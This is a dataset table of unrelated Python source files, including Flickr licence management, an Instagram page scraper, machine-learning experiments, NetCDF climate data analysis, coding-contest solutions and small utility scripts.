text stringlengths 38 1.54M |
|---|
#!/usr/bin/env python
# -*-coding:utf-8 -*
# **********************************************************************
# * SetPerm.py *
# * ---------- *
# * *
# **********************************************************************
# ======================================================================
# = Initializations =
# ======================================================================
# Modules
# =======
import sys
# import os.path
# import re
# import argparse
# import subprocess
# import fnmatch
import math
#import time
#import shutil
# , os.stat
# import flickrapi
sys.path.append('./python')
from NeferPhotos import *
from NeferFlickr import *
NbError = 0
PerPage = 500 # Max 500
#Flickr authorization
flickr = flickrapi.FlickrAPI(APIKey, APISecret)
(token, frob) = flickr.get_token_part_one(perms="write")
if not token :
raw_input("Press ENTER after you authorized this program")
flickr.get_token_part_two((token, frob))
# Fetch licence information
try :
LicenceList = flickr.photos_licenses_getInfo()
except Exception, rc :
print rc
print "Error fetching licence info : %s / %s" % (
LicenceList.find("err").get("code"),
LicenceList.find("err").get("msg")
)
# Find the Creative Commons "Attribution-NonCommercial-NoDerivs"
# licence (CC BY-NC-ND)
for Licence in LicenceList[0].findall('.//license') :
if Licence.get("url").find("by-nc-nd") > 0 :
print Licence.get("id"), Licence.get("name"), Licence.get("url")
LicenceID = Licence.get("id")
# Photoset list
try :
PhotosetList = flickr.photosets_getList(user_id=UserID)
except Exception, rc :
print rc
print "Error fetching photoset list : %s / %s" % (
PhotosetList.find("err").get("code"),
PhotosetList.find("err").get("msg")
)
exit(2)
for Photoset in PhotosetList[0].findall(".//photoset") :
if Photoset.find("title").text != "Kalarippayatt, par Flore Chapon" :
SetID = Photoset.get("id")
Name = Photoset.find("title").text
CountP = int(Photoset.get("photos"))
CountV = int(Photoset.get("videos"))
Pages = int(math.ceil(float(CountP + CountV) / float(PerPage)))
# for Page in range(Pages, 1, -1 ) :
for Page in xrange(1, Pages+1) :
try :
PhotoList = flickr.photosets_getPhotos(
photoset_id=SetID, per_page=PerPage, page=Page)
except Exception as rc :
print rc
print "Error retrieving photo list for \
photoset <%s> : %s / %s" % (
Name, PhotoList.find("err").get("code"),
PhotoList.find("err").get("msg")
)
continue
print "%s : %i photos, %i videos, page %i/%i" % (
Name, CountP, CountV, Page, Pages
)
Nb = 0
for Photo in PhotoList[0] :
PhotoID = Photo.get('id')
Title = Photo.get('title')
try :
PhotoInfo = flickr.photos_getInfo(photo_id=PhotoID)
except Exception, rc :
print rc
print "Error getting info for <%s> in \
photoset <%s> : %s / %s" % (
Title, Name,
PhotoInfo.find("err").get("code"),
PhotoInfo.find("err").get("msg")
)
NbError += 1
continue
LicenceOri = PhotoInfo.find(".//photo").get("license")
IsPublic = PhotoInfo.find(".//visibility").get("ispublic")
IsFriend = PhotoInfo.find(".//visibility").get("isfriend")
IsFamily = PhotoInfo.find(".//visibility").get("isfamily")
PermComment = PhotoInfo.find(".//permissions").get("permcomment")
PermAddmeta = PhotoInfo.find(".//permissions").get("permaddmeta")
if IsPublic == "1" :
PermCommentNew = "3"
PermAddmetaNew = "1"
elif IsFamily == "1" or IsFriend == "1" :
PermCommentNew = "1"
PermAddmetaNew = "1"
else :
PermCommentNew = "0"
PermAddmetaNew = "0"
if PermComment != PermCommentNew or \
PermAddmeta != PermAddmetaNew or \
LicenceOri != LicenceID :
print "%s | %s %s %s | %s %s | %s" % (
LicenceOri, IsPublic, IsFriend, IsFamily,
PermComment, PermAddmeta, Title
)
if PermComment != PermCommentNew or \
PermAddmeta != PermAddmetaNew :
try :
Result = flickr.photos_setPerms(
photo_id=PhotoID,
is_public=IsPublic, is_friend=IsFriend, is_family=IsFamily,
perm_comment=PermCommentNew, perm_addmeta=PermAddmetaNew
)
except Exception, rc :
print rc
print "Error setting perms for <%s> in \
photoset <%s> : %s / %s" % (
Title, Name,
Result.find("err").get("code"),
Result.find("err").get("msg")
)
NbError += 1
continue
if LicenceOri != LicenceID :
try :
Result = flickr.photos_licenses_setLicense(
photo_id=PhotoID , license_id=LicenceID
)
except Exception, rc :
print rc
print "Error setting licence for <%s> in \
photoset <%s> : %s / %s" % (
Title, Name,
Result.find("err").get("code"),
Result.find("err").get("msg")
)
NbError += 1
continue
Nb += 1
if Nb % 10 == 0 :
print Nb
if NbError > 0 :
print "%i photos could not be updated" % (NbError)
|
import sys, re
regex = re.compile(
r'^(?:http|ftp)s?://' # http:// or https://
# domain...
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|'
r'localhost|' # localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
class Downloader:
def __init__(self):
print("Object initated")
super().__init__()
def __del__(self):
print("object cleared")
if __name__ == "__main__":
print(sys.argv) # include script name
print(sys.argv[1:]) # exclude script name
print(re.match(regex, sys.argv[1]) is not None)
test = Downloader()
print("test end...")
|
__author__ = 'nikosteinhoff'
import numpy as np
from src import feature_extraction
from src.boxcox_transformer import BoxCoxTransformer
import src.model_specifications as model_specs
from src.model_specifications import Model
from sklearn import preprocessing
from sklearn import cross_validation
from matplotlib.backends.backend_pdf import PdfPages
import matplotlib.pyplot as plt
def calculate_driver(driver, rebuild_dataset=False):
print("Calculating driver {0}".format(driver))
data = feature_extraction.build_data_set(driver, rebuild_dataset)
probabilities, models = classify_data(data)
sorted_probabilities = probabilities[probabilities[:, 1].argsort()]
calibration = np.linspace(0, 100, 200)
calibrated_probabilities = np.column_stack((sorted_probabilities, calibration))
sorted_calibrated_probabilities = calibrated_probabilities[calibrated_probabilities[:, 0].argsort()]
driver_results = np.column_stack((np.ones((sorted_calibrated_probabilities.shape[0], 1))*driver,
sorted_calibrated_probabilities))
return driver_results, models
def classify_data(data):
x, y, trip_id = split_data_target_id(data)
use_boxcox_transform = False
models = {}
for name, model in model_specs.model_specifications.items():
models[name] = Model(model, name)
kf = cross_validation.StratifiedKFold(y, n_folds=5, random_state=123)
for train_index, test_index in kf:
x_train, x_test = x[train_index], x[test_index]
y_train, y_test = y[train_index], y[test_index]
# Remove skewness
if use_boxcox_transform:
bc_transformer = BoxCoxTransformer()
bc_transformer.fit(x_train)
x_train = bc_transformer.transform(x_train)
x_test = bc_transformer.transform(x_test)
# Normalization
scale = preprocessing.StandardScaler().fit(x_train)
x_train = scale.transform(x_train)
x_test = scale.transform(x_test)
# Training
for model in models.values():
model.fit_model(x_train, y_train)
# Evaluation
for model in models.values():
y_predict = model.predict_probabilities(x_test)[:, 1]
model.score_model(y_test, y_predict)
# Select the model with the best cv-rocauc
best_model = pick_best_model(models)
best_model.fitted = None
# Pre-processing
# Remove skewness
bc_transformer = BoxCoxTransformer()
if use_boxcox_transform:
bc_transformer.fit(x)
x = bc_transformer.transform(x)
final_scale = preprocessing.StandardScaler().fit(x)
x_final = final_scale.transform(x)
# Final fit on complete data set
best_model.fit_model(x_final, y)
# Prediction
original_cases = y == 1
x_predict = x[original_cases]
trip_id_predict = trip_id[original_cases]
if use_boxcox_transform:
x_predict = bc_transformer.transform(x_predict)
x_predict = final_scale.transform(x_predict)
y_scores = best_model.predict_probabilities(x_predict)[:, 1]
trip_probabilities = np.column_stack((trip_id_predict, y_scores))
return trip_probabilities, models
def split_data_target_id(data):
x = data[:, 2:]
y = data[:, 0]
trip_id = data[:, 1]
return x, y, trip_id
def pick_best_model(model_objects):
models = list(model_objects.values())
avg_scores = [m.avg_score for m in models]
best_model = models[avg_scores.index(max(avg_scores))]
best_model.count = 1
return best_model
def explore_data(data):
plt.interactive(False)
pp = PdfPages('plots.pdf')
for i in range(data.shape[1]):
column = data[:, i]
plt.hist(column)
pp.savefig()
plt.clf()
pp.close()
return
if __name__ == '__main__':
for i in calculate_driver(1, False):
print(i)
print("Done!") |
from PIL import Image
from shutil import copyfile
import os
orgfile = input('File name (without .jpeg or .png): ')
orgfile = os.path.dirname(os.path.abspath(__file__)) + '/' + orgfile
mode = ''
try:
file = orgfile + '.png'
outputfile = copyfile(file, 'output.png')
mode = 'png'
except FileNotFoundError:
try:
file = orgfile + '.jpeg'
outputfile = copyfile(file, 'output.jpeg')
mode = 'jpg'
except FileNotFoundError:
try:
file = orgfile + '.jpg'
outputfile = copyfile(file, 'output.jpg')
mode = 'jpg'
except FileNotFoundError:
print("File not supported (check if you've written the right file name)")
exit()
img = Image.open(outputfile)
firstpix = img.getpixel((0,0))
for y in range(img.height):
for x in range(img.width):
if img.getpixel((x,y)) != firstpix:
if (mode == 'jpg'):
img.putpixel((x,y), (255,255,255))
if (mode == 'png'):
img.putpixel((x,y), (255))
img.save(outputfile) |
from simplejson import loads
import requests
from django.core.management.base import BaseCommand
def request_func(url=None):
header = {
"user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36",
"accept-language": "en-US,en;q=0.8",
"X-Proxy-Country": "US"
}
try:
req = requests.request('GET', url=url, headers=header, timeout=25, verify=False)
if req.status_code == 200:
return True, req.content
else:
return False, {"error": "request failed: not 200", "status code": str(req.status_code), "url": url}
except:
return False, {"error": "request failed: request function try except", "url": url}
def parse_ins(req_content=None):
try:
html = req_content
text = html[html.index(str("window._sharedData = ").encode("utf-8")) + 21:]
text = (text[:text.index(str("};</script>").encode("utf-8"))] + str("}").encode("utf-8")).replace(
str('\\"').encode("utf-8"), str("").encode("utf-8"))
dictionary = loads(text)
return dictionary
except Exception as e:
return {'error': 'parse ins function try except'+ str(e)}
class Command(BaseCommand):
def handle(self, *args, **kwargs):
try:
url = "https://www.instagram.com/animeromance___/"
success, content = request_func(url=url)
if success:
return parse_ins(req_content=content)
else:
return content
except Exception as e:
return {"error": "handler function try except: " + str(e)}
|
import numpy
import theano
import theano.tensor as T
rng = numpy.random
N=100
feats=3
D = (rng.randn(N, feats), rng.randint(size=N, low=0, high=2))
training_steps=100
regFactor=0.01
lr=0.01
x = T.matrix("x")
y = T.vector("y")
w = theano.shared(rng.randn(feats), name="w")
b = theano.shared(0, name="b")
pred_score = 1 / (1 + T.exp(-T.dot(w, x) - b))
pred = pred_score > 0.5
crossEnt = -y * T.log(pred_score) - (1 - y) * T.log(1 - pred_score)
cost = crossEnt.mean() + regFactor * (w ** 2).sum()
gw, gb = T.grad(cost, [w, b])
train = theano.function(inputs=[x,y], outputs=[pred, crossEnt], updates=((w, w - lr * gw), (b, b - lr * gb)))
predict = theano.function(inputs=[x], outputs=pred)
for i in range(training_steps):
pred, err = train(D[0], D[1])
print("Final model:")
print(w.get_value())
print(b.get_value())
print("target values for D:")
print(D[1])
print("prediction on D:")
print(predict(D[0]))
|
import sys
import time
from scipy import interpolate
from utils import *
import matplotlib.pyplot as plt
from netCDF4 import Dataset
from nco import Nco
import directories
def extract_data(algae_type, variables, start_date, end_date, num_ens, monthly=False, lat=None, lon=None,
grid=False, mask=None):
"""
Extracts the data given by the user and stores them
:param algae_type: name of prefix of filename to look into
:param variables: list of variables to extract from files e.g. ['temp', 'sal']
:param start_date: start date given to user
:param end_date: end date given to user
:param num_ens: number of ensembles, int
:param monthly: data is stored in monthly increments (time = 12) else assumed (time = 365)
:param lat: latitude, set if grid or sample point, floats
:param lon: longitude, set if grid or sample point, floats
:param grid: set if grid point is given
:param mask: set if mask file is given, file containing the boolean array of mask to go over grid, string
:return: dictionary storing arrays or list of arrays:
e.g. if only one file inputted and variables = ['temp', 'sal'], then
dict = {'temp': [...], 'sal': [...]
if multiple files inputted and variables = ['temp', 'sal'], then
dict = {'temp': [ [..], [..], ..], 'sal': [ [..], [..], ..]
units: units of variables
files: the data nc files that will be used if function write write_averages_to_netcdf_file
"""
# Check if sample point
sample = False
if lat and lon and not grid:
sample = True
# Get day, month and year
day_s, mon_s, yr_s = start_date[0], start_date[1], start_date[2]
day_e, mon_e, yr_e = end_date[0], end_date[1], end_date[2]
# Get path
path = directories.CLIMATE_DATA
# Get files and min and maximum year
files, min_yr, max_yr = get_files_time_period(algae_type, yr_s, yr_e)
# Save list of dictionaries - each dict in the list is an ensemble
saved = [{} for _ in range(num_ens)]
# Save the units of the variables to use later
save_units = True # only save in the first for loop
units = {}
save_mask = True # only save mask in the first for loop
mask_arr = None
nan_values = {}
for file in files:
# For each relevant file, make dataset and get variable data
dataset = Dataset(os.path.join(path, file), 'r')
# Get file ensemble number
ens_num = get_ens_num(file)
# Get corresponding index in list
indx = ens_to_indx(ens_num)
# Grid point: Get size and name of dimensions
time_size, lat_size, lon_size = None, None, None
time_name, lat_name, lon_name = 'time', None, None
# If grid and sample point, save names and size of time, latitude and longitude
if grid or sample or mask:
for dd in dataset.dimensions:
if dd == time_name:
time_size = dataset.dimensions[dd].size
if dd[0].lower() == 'y' or dd[:3].lower() == 'lat':
lat_size = dataset.dimensions[dd].size
lat_name = dd
if dd[0].lower() == 'x' or dd[:3].lower() == 'lon':
lon_size = dataset.dimensions[dd].size
lon_name = dd
# If mask, then save mask array for only the first loop
# Check if mask
if mask and save_mask:
# open file and save a np array
try:
mask_arr = np.loadtxt(mask, usecols=range(lon_size), dtype=np.int)
save_mask = False
except IndexError:
print("Error: extract_data function: mask file does not have correct latitude and longitude.")
sys.exit()
# Save the data for each variable
for var in variables:
if save_units: # Save for only the first file
nan_val = dataset.variables[var].missing_value
nan_values[var] = nan_val
ds = np.array(dataset.variables[var])
# If we have grid or sample point
if grid or sample:
# Check that dimensions match : Note this only works with 3d data
if (time_size, lat_size, lon_size) == ds.shape:
# Get lat and lon array
lat_arr, lon_arr = np.array(dataset.variables[lat_name]), np.array(dataset.variables[lon_name])
if grid:
# Get index of closest value to lat and lon in arrays
lat_indx, lon_indx = find_nearest(lat_arr, lat), find_nearest(lon_arr, lon)
# Get specific grid point in variable
ds = ds[:, lat_indx, lon_indx]
if sample:
ds_ = []
for j in range(ds.shape[0]):
f = interpolate.interp2d(lon_arr, lat_arr, ds[j])
ds_.append(f(lon, lat))
# Replace ds
ds = np.asarray(ds_).flatten()
else:
print("Error: extract_data function: Dimensions do not match with variables.")
sys.exit()
if save_units: # Save the units for only the first file
unit = dataset.variables[var].units
units[var] = unit
# Check if variable name is already in dict, if so add to the list in dict
if var in saved[indx]:
cur_d = saved[indx].get(var)
# Concatenate list saved and new list
ds = np.concatenate((cur_d, ds))
if mask:
# use mask to select relevant point in grid
for i in range(ds.shape[0]):
d = np.ma.array(ds[i], mask=mask_arr, fill_value=nan_values[var])
ds[i] = d.filled()
# Save variable name and data in the dict
saved[indx][var] = ds
# Close datset
dataset.close()
# Do not save units anymore, since we have all units now
save_units = False
# Get specific time frame
till_start, till_end = get_diff_start_end(start_date, end_date, min_yr=min_yr, monthly=monthly)
# For multiple years in one file, the dicts in saved should have shape of max_yr - min_yr + 1
# If days are reduced then select time frame
if (till_end - till_start) != saved[0][variables[0]].shape[0]:
for var in variables:
for indx in range(num_ens):
saved[indx][var] = saved[indx][var][till_start:till_end, :, :]
return saved, units, files, nan_values
def create_histogram(list_ens, units, start_date, end_date, nan_values, monthly=False, save_out=None,
cov=None, sel=None, plot=False):
"""
Analysis the data given - in this case it computes the histogram (assumes grid/sample point)
:param list_ens: the list of ensembles (dicts) containing the data of the climate variables
:param units: the units matching to each variable
:param start_date: start date given to user
:param end_date: end date given to user
:param nan_values: the missing values in the variables data array
:param monthly: data is stored in monthly increments (time = 12) else assumed (time = 365)
:param save_out: if set, then save output of histogram/ rimeseries
:param cov: if set, then perform covariance analysis
:param sel: selection option for bin siz, default is fd - Freedman Diaconis Estimator
:param plot: if plot is true, then shows plot of histogram
:return: None
"""
if not sel:
sel = 'fd'
fig, axs = plt.subplots(len(list_ens), len(list_ens[0]), squeeze=False)
time_str = "daily"
if monthly:
time_str = "monthly"
fig.suptitle("Variables " + str(list(list_ens[0])) + " measured " + time_str + " between " + str(start_date[0]) +
"-" + str(start_date[1]) + "-" + str(start_date[2]) + " and " + str(end_date[0]) + "-" +
str(end_date[1]) + "-" + str(end_date[2]) + " using the E2S2M climate model")
a, e = 0, 0
for dict_ in list_ens:
axs[e, a].set_title("Ensemble " + str(e))
for d in dict_:
ens = dict_[d].flatten()
indices = np.argwhere(np.isclose(ens, nan_values[d]))
ens = np.delete(ens, indices)
hist, bin_edges = np.histogram(ens, bins=sel)
print(ens)
if plot and not cov:
axs[e, a].hist(ens, bins=sel)
axs[e, a].set_ylabel("Frequency")
axs[e, a].set_xlabel(d + ' (' + units[d] + ')')
# a += 1
if plot and cov: # If covariance between 2 variables, plot a 2d histogram
axs[a].hist2d(ens, bins=sel)
e += 1
plt.show()
return None
def create_timeseries(list_ens, units, start_date, end_date, monthly=False, save_out=None, cov=None):
"""
Analysis the data given - in this case it computes the timeseries (assumes grid/sample point)
:param list_ens: the list of ensembles (dicts) containing the data of the climate variables
:param units: the units matching to each variable
:param start_date and end_date: extract data within this time frame
:param monthly: data is stored in monthly increments (time = 12) else assumed (time = 365)
:param save_out: if set, then save output of histogram/ rimeseries
:param cov: if set, then perform covariance analysis
:return: None
"""
return None
def compute_average(list_ens, nan_values):
"""
Analysis the data given - in this case it computes the mean
:param list_ens: the list of ensembles (dicts) containing the data of the climate variables
:param nan_values: missing values in data set
:return:
ens_means: list of averages of the different ensembles
"""
# Holds the means for each ensemble
ens_means = []
for dict_ in list_ens:
# Save the mean of each variable in a dict of list
means = {}
# Calculate the mean of each variable in the dictionary given
for d in dict_:
# Select the parts of the data within timeframe
mean = np.mean(dict_[d], axis=0)
# Replace values close to nan values to actual nan values
if mean.shape:
mean[np.isclose(mean, nan_values[d], rtol=1)] = nan_values[d]
# Save mean for variable
means[d] = mean
ens_means.append(means)
return ens_means
def write_means_to_netcdf_file(files, ens_means, variables, start_date, end_date, argv, test=False):
"""
Write means computed in netcdf files
:param files: initial files
:param ens_means: ensemble means calculated calling function compute_average
:param variables: list of variables
:param start_date: start date list in [day, month, year] format
:param end_date: end date list in [day, month, year] format
:param argv: string containing command line arguments used
:param test: if test is true, make some changes specific to files on my pc
:return: None, files created in folder analysis/ensemble_means
"""
# Initialise Nco
nco = Nco()
# Start and end date string
start_end_str = str(start_date[0]) + "-" + str(start_date[1]) + "-" + str(start_date[2]) + " and " + \
str(end_date[0]) + "-" +str(end_date[1]) + "-" + str(end_date[2])
# Get path
path = directories.CLIMATE_DATA
# Get normal and files in absolute path saved in ensemble groups
ens_files = [[] for _ in range(len(ens_means))]
abs_files = [[] for _ in range(len(ens_means))]
# Get absolute path of each file
for i in range(len(files)):
# Get file ensemble number index
ens_indx = ens_to_indx(get_ens_num(files[i]))
# save in ens_files
ens_files[ens_indx].append(files[i])
# Get absolute path
joined = os.path.abspath(os.path.join(path, files[i]))
if test:
joined = joined.replace("Adanna Akwataghibe", "Adanna")
# save in ens_files
abs_files[ens_indx].append(joined)
# Get folder to store ensemble means
results = directories.ANALYSIS
mean_folder = os.path.abspath(os.path.join(results, directories.MEANS))
if test:
mean_folder = mean_folder.replace("Adanna Akwataghibe", "Adanna")
# Go through ensembles, merge files to get output and write to output
for i in range(len(ens_means)):
# Get first file name in specific ensemble and add last year to name - use as output file name
output_file = ""
if ens_files[i][0].endswith(".nc"):
output_file = ens_files[i][0][:-3] + '_' + str(end_date[2]) + '.nc'
output_file = os.path.join(mean_folder, output_file)
# Merge files in ensemble in output_file
nco.ncecat(input=abs_files[i], output=output_file)
# Write means to file
with Dataset(abs_files[i][0], 'r') as src, Dataset(output_file, 'a') as dest:
for var in variables:
# create dataset identical to original variable in file
mean_var_name = var + '_mean'
datatype = src.variables[var].datatype
# Get dimensions without time
dims = src.variables[var].dimensions[1:]
mean_var = dest.createVariable(mean_var_name, datatype, dims)
# save means in variable
mean_var[:] = ens_means[i][var][:]
mean_var.setncatts(src[var].__dict__)
mean_var.long_name = mean_var.long_name + ' averaged between ' + start_end_str
# Write to description and history of file
desc_str = "Added averages of variables " + ', '.join(variables) + " within time period " + \
start_end_str
if 'description' in dest.ncattrs():
dest.description = desc_str + ' \n' + dest.description
else:
dest.description = desc_str
dest.history = time.ctime(time.time()) + ': Commands used to produce file: ' + argv + ' \n' + \
time.ctime(time.time()) + ': Functions used: extract_data, compute_average,' \
' write_means_to_netcdf_file' + ' \n' + dest.history
print("Mean ensemble files created in " + os.path.join(directories.ANALYSIS, directories.MEANS) + "folder.")
def plot_graph(file):
"""
Plot the data given in file
:param file: file from analysis
:return: graph plot in output + saves as png file
"""
# Open file
dataset = Dataset(file, 'r')
d = np.array(dataset.variables['mean_air_temperature'])
fig, ax = plt.subplots()
ax.imshow(d)
png_file = file.rstrip('nc') + 'png'
fig.savefig(png_file)
print("Image is saved in the " + directories.ANALYSIS + " folder as a png file.")
return None
|
from database import Database
from menu import Menu
__author__ = 'dhairya'
Database.initialize()
menu = Menu()
menu.run_menu()
|
import sys
import heapq
import numpy as np
from math import factorial
def solution(W, H, P, Q, N, X, Y, a, b, c, d):
x = [X] * N
y = [Y] * N
for i in range(1, N):
x[i] = (x[i-1] * a + y[i-1]*b +1) % W
y[i] = (x[i-1] * c + y[i-1]*d +1) % H
deads = zip(x, y)
#return dumbsol(W, P, H, Q, deads)
return sol(W, P, H, Q, deads)
#return fastsol(W, P, H, Q, deads)
def sol(W, P, H, Q, deads):
matrix = np.zeros((W, H))
c = 0
for d in deads:
c += 1
print c
matrix[max(0, d[0] - P + 1):d[0] + 1, max(0, d[1] - Q + 1):d[1] + 1] = 1
# for i in range(max(0, d[0] - P+ 1), d[0] +1):
# for j in range(max(0, d[1] - Q + 1), d[1] + 1):
# matrix[i,j] = 1
#print matrix
count = 0
for j in range(H-Q +1):
for i in range(W-P+1):
print i,j
if matrix[i,j] == 0:
count += 1
return count
def fastsol(W, P, H, Q, deads):
matrix = np.zeros((W, H))
deads.sort(key=lambda x: sorted(list(x), reverse=True))
#print deads
c = 0
for x, y in deads:
rangey = max(-1, y - Q)
rangex = max(-1, x - P)
done = False
c += 1
print c, y, rangey, x, rangex
for j in range(y, rangey, -1):
for i in range(x, rangex, -1):
if matrix[i,j] == 1:
if i == x:
done = True
rangex = i
break
matrix[i,j] = 1
if done:
break
#print matrix
count = 0
for i in range(W-P+1):
for j in range(H-Q +1):
if matrix[i,j] == 0:
count += 1
return count
def dumbsol(W, P, H, Q, deads):
count = 0
for i in range(W-P + 1):
for j in range(H-Q + 1):
found = False
for k, dead in enumerate(deads):
if i <= dead[0] < i + P and j <= dead[1] < j + Q:
found = True
break
if not found:
count += 1
return count
if __name__ == '__main__':
filep = open(sys.argv[1])
t = int(filep.readline())
for l in range(t):
#for l in range(1):
W, H, P, Q, N, X, Y, a, b, c, d = map(int, filep.readline().split())
ans = solution(W, H, P, Q, N, X, Y, a, b, c, d)
print 'Case #%d: %s' % (l+1, ans)
|
class Solution(object):
def subsetsWithDup(self, nums):
"""
:type nums: List[int]
:rtype: List[List[int]]
"""
nums.sort()
result = []
self.calSubset(nums, 0, [], result)
return result
def calSubset(self, nums, start, cur, result):
result.append(cur)
for i in range(start, len(nums)):
if i == start or nums[i] != nums[i-1]:
self.calSubset(nums, i+1, cur+[nums[i]], result)
|
#!/usr/bin/env python
import sys
import argparse
import glob
import os
import numpy as np
from fastq_reader import Fastq_Reader
# FUNC
def interface():
parser = argparse.ArgumentParser(description="Creates the hash function.")
parser.add_argument('-i',
required=True,
dest='IN',
type=str,
metavar='<input_dir>',
help='The input directory.')
parser.add_argument('-o',
required=True,
dest='OUT',
type=str,
metavar='<output_dir>',
help='The output directory.')
parser.add_argument('-r',
required=True,
dest='task_rank',
type=int,
help='Task rank of the current job.')
args = parser.parse_args()
return args
def unique(array):
seen = set()
seen_add = seen.add
return [x for x in array if not (x in seen or seen_add(x))]
# MAIN
if __name__ == "__main__":
args = interface()
input_dir = os.path.abspath(args.IN)
if not input_dir.endswith('/'):
input_dir += '/'
output_dir = os.path.abspath(args.OUT)
if not output_dir.endswith('/'):
output_dir += '/'
task_rank = args.task_rank - 1
FP = glob.glob(os.path.join(input_dir,'*.hashq.*'))
FP = [fp[fp.rfind('/')+1:] for fp in FP]
FP = list(unique([fp[:fp.index('.')] for fp in FP]))
file_prefix = FP[task_rank]
hashobject = Fastq_Reader(input_dir, output_dir)
H = hashobject.merge_count_fractions(file_prefix)
H = np.array(H, dtype=np.uint16)
nz = np.nonzero(H)[0]
np.save(hashobject.output_path + file_prefix + '.nonzero.npy', nz)
print('Sample {0} has {1} nonzero elements and {2} total observed kmers'.format(file_prefix, len(nz), H.sum())) |
# This is a very simple, minimal python script to capture video through
# a webcam and save it to a hard drive. Use a filename to test w/o webcam.
import cv2
cap = cv2.VideoCapture(0) # need a webcam for this to work or replace 0 w/ filename
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
# Your VideoWriter Codec may vary info here:
# https://www.pyimagesearch.com/2016/02/22/writing-to-video-with-opencv/
writer = cv2.VideoWriter('captured.avi', cv2.VideoWriter_fourcc(*'XVID'),20,(w,h))
while True:
ret,frame = cap.read()
writer.write(frame)
cv2.imshow('frame',frame)
# hit the q key to exit
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
writer.release()
cv2.destroyAllWindows()
|
# B-2
line = int(input('行列を入力してください: '))
column = int(input('列を入力してください: '))
for i in range(1, line + 1):
for j in range(1, column + 1):
print(i * j, end=' ')
print()
|
import random
encoded = "BNZQ:1l36de9583w5516fv3b8691102224f3e"
flag = ""
random.seed("random")
for c in encoded:
if c.islower():
flag += chr((ord(c)-ord('a')-random.randrange(0,26)+26)%26 + ord('a'))
elif c.isupper():
flag += chr((ord(c)-ord('A')-random.randrange(0,26)+26)%26 + ord('A'))
elif c.isdigit():
flag += chr((ord(c)-ord('0')-random.randrange(0,10)+10)%10+ ord('0'))
else:
flag += c
print flag |
"""Generate the models file."""
# pylint: disable=useless-import-alias
import dataclasses
import typing
from open_alchemy import facades
from open_alchemy import types as oa_types
from . import model as _model
from . import models as _models
from . import types as types
class ModelsFile:
"""Keeps track of models and writes them as output."""
def __init__(self):
"""Construct."""
self._models: typing.Dict[str, oa_types.Schema] = {}
def add_model(self, schema: oa_types.Schema, name: str) -> None:
"""
Add model to be tracked.
Args:
schema: The schema of the model.
name: The name of the model.
"""
if name in self._models:
return
self._models[name] = schema
def generate_models(self) -> str:
"""
Generate the models file.
Returns:
The source code for the models file.
"""
# Generate source code for each model
model_sources: typing.List[str] = []
for name, schema in self._models.items():
model_source = _model.generate(schema=schema, name=name)
model_sources.append(model_source)
# Generate source code for models file
raw_source = _models.generate(models=model_sources)
return facades.code_formatter.apply(source=raw_source)
|
#!/usr/bin/env python3
class GeoCompensate():
# The approximate area of Yarra, the smallest district in our LGA file
THRESHOLD = 0.00205152
def geoCompensate(self, box):
xmax = box[2][0]
xmin = box[0][0]
ymax = box[2][1]
ymin = box[0][1]
area = (ymax - ymin) * (xmax - xmin)
if area <= self.THRESHOLD:
x_coordinate = (xmax + xmin) / 2
y_coordinate = (ymax + ymin) / 2
return [x_coordinate, y_coordinate]
else:
return []
|
import solution
import os
dir_with_images = 'smiles'
test_image = '1a.jpg'
sol = solution.Solver(dir_with_images)
print(sol.predict(os.path.join(dir_with_images,test_image))) |
#!/usr/bin/env python
# -*- coding: utf-8; -*-
import random
from time import time
num = 1000
def init():
li = []
random.seed( int( time()))
for x in range( 0, num ):
li.append( int( random.random() * num ))
return li
def sort( li ):
liLen = len( li )
# h[n+1]=3h[n]+1
h = [ 1,4,13,40,121,364,1093,3280,9841,29524,88573,265720,
797161,2391484,7174453,21523360,64570081,193710244,
581130733,1743392200,5230176601,15690529804,47071589413,
141214768240,423644304721,1270932914164,3812798742493,
11438396227480,34315188682441,102945566047324
]
for i in range( 0, len( h ))[::-1]:
if liLen > h[i]:
j = 0
while j + h[i] < liLen:
k = j + h[i]
while k < liLen:
if li[j] > li[k]:
li[j], li[k] = li[k], li[j]
k = k + h[i]
j += 1
i -= 1
return li
if __name__ == '__main__':
t = time()
print sort( init())
print time() - t
|
import jieba
import string
import nltk
def get_chinese_characters(raw):
"""Return list of Chinese characters in sentence.
:param raw: raw chinese text
"""
return list(sentence)
def get_chinese_words(raw):
"""Return list of Chinese words in sentence without stopwords.
:param raw: raw chinese text
"""
stop_words = open("C:/Users/ASUS/Desktop/Thesis/stop_words/stop_words.txt")
stop_words = stop_words.read()
tokens = jieba.lcut(raw)
result = [i for i in tokens if not i in stop_words]
return result
def get_chinese_character_positions(raw):
"""Return a list of characters with their positions in the words.
:param raw: raw chinese text
"""
return [u'{}{}'.format(char, i)
for word in get_chinese_words(raw)
for i, char in enumerate(word)]
def get_topic_distribution(lda_model, raw_input, dictionary):
"""Return a vecor of topical distribution of each document or text.
:param lda_model: the output of the function gensim.models.ldamodel.LdaModel
:param raw_imput: raw chinese policy text or doc
:param dictionary: the output of corpora.Dictionary() function which is the vocab.
"""
other_texts = [ # needs tokenized
get_chinese_words(raw_input)
]
#dictionary = Dictionary(sentences)
other_corpus = [dictionary.doc2bow(text) for text in other_texts]
unseen_doc = other_corpus[0]
vector = lda_model[unseen_doc][0]
return(vector)
def get_NdaysAgo_Data_from(today,date_col,df, days):
"""Retrieves data N-days ago.
:param today: format = 'YYYY-MM-DD'
:param date_col:
:param days: n days ago
:return: df with desired time frame
"""
today = pd.to_datetime(today)
begin = today - pd.offsets.Day(days)
return(df[(date_col < today) & (date_col > begin)])
def get_NdaysAhead_Data_from(today,date_col,df, days):
"""Retrieves data N-days ahead in the future, in relations to "today".
:param today: format = 'YYYY-MM-DD'
:param date_col: your 'date' column (datetime64) format
:param days: n days in the future
return: df with desired time frame
"""
today = pd.to_datetime(today)
begin = today + pd.offsets.Day(days)
return(df[(date_col >= today) & (date_col <= begin)])
|
# conversion program
# written by Kurtis Norman
# 2nd May 2021
